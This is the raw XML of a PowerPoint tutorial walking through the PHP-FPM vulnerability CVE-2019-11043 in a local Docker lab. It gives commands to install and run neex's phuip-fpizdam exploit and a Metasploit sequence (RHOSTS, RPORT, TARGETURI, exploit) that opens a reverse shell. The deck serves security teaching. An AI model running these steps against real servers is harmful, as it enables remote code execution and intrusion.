              <a:t> for your operating system</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Linux – ‘sudo apt install golang’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Download the exploit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> go get -v github.com/neex/phuip-fpizdam</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Install the exploit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>go install github.com/neex/phuip-fpizdam</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Run the exploit on the container we previously made </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>~go/bin/phuip-fpizdam http://localhost:8080/script.php</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="94071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8CC2-24BB-45DC-AD94-F0D3EEE2F598}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Using a go script (continued)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E2FC7E39-96F3-4493-840F-CE8F90915676}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>You should see a success message similar to the following.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If you open a web browser, you’ll notice that you can now execute commands as if you were inside the docker container by appending them to the query in the URL. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{29860D15-F239-4AF0-9657-D9F18932A5DA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1262393" y="2710882"/>
            <a:ext cx="7265080" cy="1770172"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3AEECEF5-55E5-432A-8877-077428BAC740}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1750963" y="5662333"/>
            <a:ext cx="4124901" cy="962159"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0D9833A9-38E2-4A97-A61C-FC9745A04FF7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6316138" y="5662332"/>
            <a:ext cx="4413854" cy="962121"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="13" name="Straight Arrow Connector 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{07D022D4-C456-4AF4-99F1-22E2A74E4A8A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="8728841" y="4135582"/>
            <a:ext cx="51214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7" name="TextBox 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BC6C3DE1-0CFC-4563-A9ED-3A54C18B17AB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9296400" y="3950916"/>
            <a:ext cx="1813510" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Note this for later</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="274501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B48-8532-4E45-9F22-EE1A280A09CB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Alternative approach using metasploit</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F0661677-FB88-489C-A502-EB67F0C7BEA2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Install </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> for your operating system </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Run Metasploit using ‘msfconsole’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>May require elevated permissions. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Choose the default options for your initial setup.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="74836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FC29-D84C-49D4-9CFA-A9402303D79B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1407322" y="-165546"/>
            <a:ext cx="9905998" cy="1478570"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Metasploit Approach (continued)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CA478CF5-B7A4-4FEA-A428-D46AC0C4D7F9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1141412" y="2051437"/>
            <a:ext cx="4861823" cy="3739764"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Once the previous steps are completed, you should be met with a page that looks like this =&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Type ‘search php-fpm’, you will get results from exploit.db</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3C1411F3-0643-41F9-B496-E02049F32D2E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2283869" y="2770254"/>
            <a:ext cx="2725062" cy="2041193"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A0590700-9C25-4397-BFDE-EBE42C7BCA76}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1111856" y="5600984"/>
            <a:ext cx="4920933" cy="1257016"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CC41124E-7724-497F-949A-FC943AC691FA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6575367" y="816634"/>
            <a:ext cx="510473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Type ‘use 0’ to select the only exploit result that is returned. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Type ‘show options’ to configure the payload of the exploit.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>You’ll notice that RHOSTS is empty, so let's set that.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Type ‘set RHOSTS localhost’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Type ‘set RPORT 8080’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Type ‘set TARGETURI /script.php’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Type ‘exploit’ to run the exploit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>You will now be immediately placed into a reverse shell where you can run commands similarly to how they are run in the web browser in the previous method.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This method is a little bit more polished as it props up a server to listen on 4444 automatically for your command responses. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A3580F37-E3C1-44F4-9901-888D32DC5692}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6360321" y="5576035"/>
            <a:ext cx="5534831" cy="1281965"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="12" name="Straight Arrow Connector 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B57D4F68-2F42-4848-ADE0-921B9AD1D4BB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="5237771" y="1182689"/>
            <a:ext cx="1405484" cy="3628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725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B0DB-78B2-4FC1-8397-CCFBA14CC542}"/>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81A670E-451E-4231-A730-A6E243A5019A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1141412" y="1586344"/>
            <a:ext cx="9905999" cy="4966855"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Now obviously this isn’t quite the same as exploiting a php-fpm instance on an actual production system. There are some steps that are usually done prior such as port enumeration. Additionally, the root php script isn’t always script.php, it could be say index.php. Either way, once you have the URL, port, and php file, both methods will determine if the configuration is vulnerable, and attempt to exploit them. Also, since this is running in a docker container, by nature of containerization, on a real system the level of damage that can be done is limited by the sandboxing effect of containers. However, there have been </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>exploits</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> for docker itself that have allowed a container root level access on the host operating system that are relatively recent. An exploit like this, followed up by an exploit to docker itself could have catastrophic effects on a company. Luckily, the guys smart enough to figure these exploits out weren’t doing so maliciously. The original discoverer of the exploit, Andrew </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Danau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, is a security researcher who was competing at Real World CTF 2019 Quals when he discovered the exploit. The exploit was later refined by Emil Lerner. The discoverer of the Docker </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>runC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> exploit were maintainers of the project. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>I will try my best to explain the php-fpm vulnerability in the following slides. In summary however, it boils down to a buffer underflow error and an exploitable default configuration file that was recommended at the time. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2794526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198</TotalTime>
  <Words>907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Php-FPM exploit (CVE-2019-11043) walkthrough</vt:lpstr>
      <vt:lpstr>To follow along</vt:lpstr>
      <vt:lpstr>Verify That the server is running </vt:lpstr>
      <vt:lpstr>Now, Let’s try the exploit</vt:lpstr>
      <vt:lpstr>Using neex’s go Script</vt:lpstr>
      <vt:lpstr>Using a go script (continued)</vt:lpstr>
      <vt:lpstr>Alternative approach using metasploit</vt:lpstr>
      <vt:lpstr>Metasploit Approach (continued)</vt:lpstr>
      <vt:lpstr>notes</vt:lpstr>
      <vt:lpstr>So what the heck is going on </vt:lpstr>
      <vt:lpstr>An Even more verbose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Php-FPM exploit (CVE-2019-11043) walkthrough</dc:title>
  <dc:creator>Aaron</dc:creator>
  <cp:lastModifiedBy>Aaron</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-04-07T20:40:35Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-04-27T13:21:10Z</dcterms:modified>
</cp:coreProperties>
</file>